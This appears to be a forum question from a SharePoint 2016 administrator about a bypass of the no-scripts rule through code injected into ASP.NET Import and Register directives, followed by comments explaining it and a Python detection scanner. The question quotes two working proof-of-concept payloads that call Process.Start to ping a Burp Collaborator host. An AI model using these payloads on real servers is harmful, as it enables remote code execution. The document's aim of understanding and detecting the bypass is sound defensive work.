
I am an administrator of a SharePoint 2016 environment and I came across this article. The author had investigated whether there were any ways to get around the no-scripts rule of a SharePoint ASP.NET environment (in web.config, script blocks are by default marked as unsafe and not allowed) and found one: they injected code into the Import & Register directives. Here are the examples of the code they used:

<%@ Page language="C#" classname="mytest_irsdl" %> 

<%@ import Namespace='System.Net;public/**/class/**/mytest_irsdl:global::System.Web.UI.Page,System.Web.SessionState.IRequiresSessionState,System.Web.IHttpHandler{public/**/static/**/object/**/@__stringResource;public/**/static/**/object/**/@__fileDependencies;public/**/static/**/bool/**/__initialized=false;object/**/test2=System.Diagnostics.Process.Start("ping","itsover.g9qrlom4l1slw29pf07k3xtoyf47sw.burpcollaborator.net");}}namespace/**/foo{using/**/System.Linq;using/**/System.Web.Security;using/**/System.Collections.Generic;using/**/System.Text.RegularExpressions;using/**/System.Web.UI.WebControls;using/**/System.Xml.Linq;using/**/System.Web.UI;using/**/System;using/**/System.Web.UI.HtmlControls;using/**/System.Web;using/**/System.Configuration;using/**/System.ComponentModel.DataAnnotations;using/**/System.Text;using/**/System.Web.Profile;using/**/System.Web.Caching;using/**/System.Collections;using/**/System.Web.UI.WebControls.WebParts;using/**/System.Web.UI.WebControls.Expressions;using/**/System.Collections.Specialized;using/**/System.Web.SessionState;using/**/System.Web.DynamicData;//' %>

Their other example:

<%@ Page language="C#" classname="mytest_irsdl" %> 
<%@ Register Tagprefix="MDSec" Namespace='System.Windows.Data;public/**/class/**/mytest_irsdl:global::System.Web.UI.Page,System.Web.SessionState.IRequiresSessionState,System.Web.IHttpHandler{public/**/static/**/object/**/@__stringResource;public/**/static/**/object/**/@__fileDependencies;public/**/static/**/bool/**/__initialized=false;object/**/test2=System.Diagnostics.Process.Start("ping","xxx.g9qrlom4l1slw29pf07k3xtoyf47sw.burpcollaborator.net");}}namespace/**/foo{using/**/System.Linq;using/**/System.Web.Security;using/**/System.Collections.Generic;using/**/System.Text.RegularExpressions;using/**/System.Web.UI.WebControls;using/**/System.Xml.Linq;using/**/System.Web.UI;using/**/System;using/**/System.Web.UI.HtmlControls;using/**/System.Web;using/**/System.Configuration;using/**/System.ComponentModel.DataAnnotations;using/**/System.Text;using/**/System.Web.Profile;using/**/System.Web.Caching;using/**/System.Collections;using/**/System.Web.UI.WebControls.WebParts;using/**/System.Web.UI.WebControls.Expressions;using/**/System.Collections.Specialized;using/**/System.Web.SessionState;using/**/System.Web.DynamicData;//' Assembly="PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35" %>

I interact much less with ASP.NET/C#, so I am not sure how this code works. Can someone please explain it to me? I ask because 1) it didn't work when I tried it (I just completely copied and pasted both of these examples, and I got no errors, but the command didn't run) and 2) I'd like to know if there's a web.config modification or some other setting that can disable this.

4yl1n
    They are taking advantage of the way the ASP.Net translator transforms `Import` or `Register` directives to add code (like a SQL Injection attack). Basically they have replaced spaces with `/**/` comments and then closed the outside code and opened a new namespace. – NetMage Oct 19 '20 at 17:55
  • @NetMage Do you have any idea as to why the code didn't work when I tried it? Here's exactly what I did: opened a test site collection in SharePoint Designer, created a site page, and added the code to it (I tried with both code examples); the only thing I changed was that, instead of pinging a website, I made it create a file on the server. I got no error when I navigated to the page in my browser, but the file was not present when I checked. – 4yl1n Oct 19 '20 at 20:54
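As an added example (not from the question, the comments, or the linked article), here is a small Python scanner a SharePoint administrator could run over site pages or uploaded .aspx content to flag the pattern NetMage describes: an Import or Register directive whose Namespace value is not a plain dotted namespace, because the page compiler pastes that value straight into a generated C# `using` line. The regexes, the indicator list and both sample pages are constructed for this example; the suspicious sample keeps only the shape of the injected directive (empty class body, no command).

```python
import re
from typing import Dict, List

# A directive looks like <%@ Name attr="value" ... %>. For Import/Register the
# compiler emits "using <Namespace value>;", so a value that is not a dotted
# identifier can only be there to break out of that generated line.
DIRECTIVE_RE = re.compile(r"<%@\s*(?P<name>\w+)\s*(?P<body>.*?)%>", re.DOTALL)
ATTR_RE = re.compile(r"""(?P<key>\w+)\s*=\s*(?P<q>['"])(?P<val>.*?)(?P=q)""", re.DOTALL)
NAMESPACE_OK = re.compile(r"^[A-Za-z_]\w*(\.[A-Za-z_]\w*)*$")
# Tokens from the injected directives on this page: statement terminators,
# braces, the /**/ comments standing in for spaces, the trailing // that
# swallows the rest of the generated line, and a class declaration.
INDICATORS = (";", "{", "}", "/**/", "//", "class")


def find_injected_directives(source: str) -> List[Dict[str, object]]:
    """One finding per Import/Register directive whose Namespace attribute
    cannot be a real CLR namespace; indicators lists which tokens were seen."""
    findings = []
    for d in DIRECTIVE_RE.finditer(source):
        name = d.group("name").lower()
        if name not in ("import", "register"):
            continue
        for a in ATTR_RE.finditer(d.group("body")):
            if a.group("key").lower() != "namespace":
                continue
            value = a.group("val").strip()
            if NAMESPACE_OK.match(value):
                continue
            findings.append({
                "directive": name,
                "value": value,
                "indicators": [t for t in INDICATORS if t in value],
            })
    return findings


# Constructed sample pages: a clean one, and one with the injected shape.
BENIGN_PAGE = """<%@ Page Language="C#" %>
<%@ Import Namespace="System.Net" %>
<%@ Register TagPrefix="asp" Namespace="System.Web.UI.WebControls" Assembly="System.Web" %>
<html><body>ok</body></html>"""

SUSPICIOUS_PAGE = """<%@ Page language="C#" classname="mytest" %>
<%@ import Namespace='System.Net;public/**/class/**/mytest{}namespace/**/foo{using/**/System;//' %>
<%@ Register Tagprefix="x" Namespace='System.Windows.Data;public/**/class/**/mytest{}namespace/**/foo{//' Assembly="PresentationFramework" %>"""

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:  # scan each .aspx file given on the command line
        with open(path, encoding="utf-8", errors="replace") as fh:
            for f in find_injected_directives(fh.read()):
                print(f"{path}: {f['directive']} directive, indicators {f['indicators']}")
```

Run with no arguments nothing is scanned; pass one or more .aspx paths to report any directive whose Namespace value breaks the dotted-identifier rule.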
